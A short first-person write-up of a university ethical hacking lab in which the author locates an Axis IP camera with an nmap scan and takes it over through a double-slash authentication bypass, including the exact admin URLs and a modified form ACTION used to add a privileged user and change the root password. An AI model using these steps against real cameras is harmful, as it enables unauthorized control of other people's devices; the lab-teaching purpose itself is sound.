Last year (2010), for my first Ethical Hacking lab, I had to bypass the HTTP authentication system of an IP camera AXIS using the Axis Network Camera HTTP Authentication Bypass security flaw to create a new user with all privileges and change the root password. This was just a funny-first-lab to get an overview of the attendants’ skills. Indeed, at least 2 prerequisites were needed:
- Scanning (nmap, netdiscover, or else)
- HTML (understand how does forms work)
The teacher set up the camera (i.e. plugged it on the network and configure it) but gave no information about it. In order to find the IP of the camera, I run a nmap scan to know all the devices connected on the network with the http port (80) open:
Leopard:~ Tosch$ nmap -p 80 10.0.0.*
Starting Nmap 5.30BETA1 ( http://nmap.org ) at 2010-10-01 17:34 BST
Nmap scan report for 10.0.0.100 Host is up (0.25s latency).
PORT STATE SERVICE
80/tcp open http
Nmap done: 256 IP addresses (66 hosts up) scanned in 11.34 seconds
(The computer that run the nmap scan was connected to the camera’s network 10.0.0.0/24)
The result shows that one device, with the IP 10.0.0.100, has its port 80 open.
When browsing http://10.0.0.100 it redirected to http://10.0.0.100/view/index.shtml with an authentication box that requires a username and a password.
To Bypass this authentication system, I used the security flaw mentioned previously by typing the address http://10.0.0.100//admin/admin.shtml (note the double slash //). It worked! I got the access to the administration panel. Then in the menu I selected System. Once again, an authentication box appears, so I added a slash after the IP to bypass it. In the System submenu I selected Users. It gave me a list of users and a form to add or modify them.
When I tried to add a user, it brought me back to the same page, with no new user. I read the source code and with Firebug, I modified the ACTION parameter of the form in order to bypass the authentication system by adding a / (slash).
Here is the form before:
<FORM NAME="WizardForm" ACTION="/this_server/ServerManager.srv" METHOD="POST">
<FORM NAME="WizardForm" ACTION="http://10.0.0.100//this_server/ServerManager.srv" METHOD="POST">
Then I tried once again to add a user with full access and it worked! It was possible to login with the new credential and change the root password.